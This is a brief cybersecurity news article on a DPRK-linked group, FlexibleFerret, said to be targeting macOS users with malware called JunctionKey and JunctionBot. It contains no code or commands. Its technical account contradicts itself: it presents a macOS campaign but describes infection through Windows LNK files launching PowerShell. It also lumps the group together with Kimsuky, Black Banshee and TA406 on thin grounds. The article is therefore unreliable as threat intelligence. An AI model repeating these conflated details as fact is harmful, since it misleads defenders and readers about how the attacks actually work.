Cybersecurity researchers have identified an ongoing campaign by FlexibleFerret, a cyberespionage group linked to the Democratic People’s Republic of Korea (DPRK), that demonstrates an increased focus on targeting macOS users. The group, also tracked under the aliases Kimsuky and Black Banshee, is deploying updated versions of its malware toolkit to infiltrate systems running Apple’s operating system.

The campaign, observed by researchers at Proofpoint, shows an evolution in the threat actor’s capabilities and a strategic expansion of its targeting beyond its more common Windows-based operations. This activity underscores a growing effort by DPRK-affiliated actors to develop and refine tools specifically for the macOS environment.

Infection Methods and Malware Capabilities

The primary infection vector used by FlexibleFerret is spear-phishing. Attackers send emails containing malicious LNK files, often disguised as legitimate documents like job descriptions. When a user opens the LNK file, it executes a PowerShell script that contacts a remote server to download additional malicious payloads.

The malware suite includes two key components. The first, a file enumerator named JunctionKey, is designed to search the compromised system for files with specific extensions. The second component, a downloader called JunctionBot, is responsible for fetching and executing further malware, allowing the attackers to establish a deeper foothold and deploy more advanced tools. The malware also establishes persistence on the infected macOS device, ensuring it remains active even after a system reboot.

Strategic Shift in DPRK Operations

This campaign signifies a notable enhancement of the group’s macOS-specific toolset. The updated versions of JunctionKey and JunctionBot exhibit improved stealth and functionality compared to previous iterations. The focus on macOS aligns with a broader trend of threat actors diversifying their targets to include platforms that are gaining popularity in enterprise environments.

The activities of FlexibleFerret show operational overlaps with another well-known DPRK-linked group, TA406. The continued development of macOS malware by these state-sponsored actors indicates a dedicated effort to compromise a wider range of targets for intelligence-gathering purposes.

Source: https://www.darkreading.com/cyberattacks-data-breaches/dprks-flexibleferret-tightens-macos-grip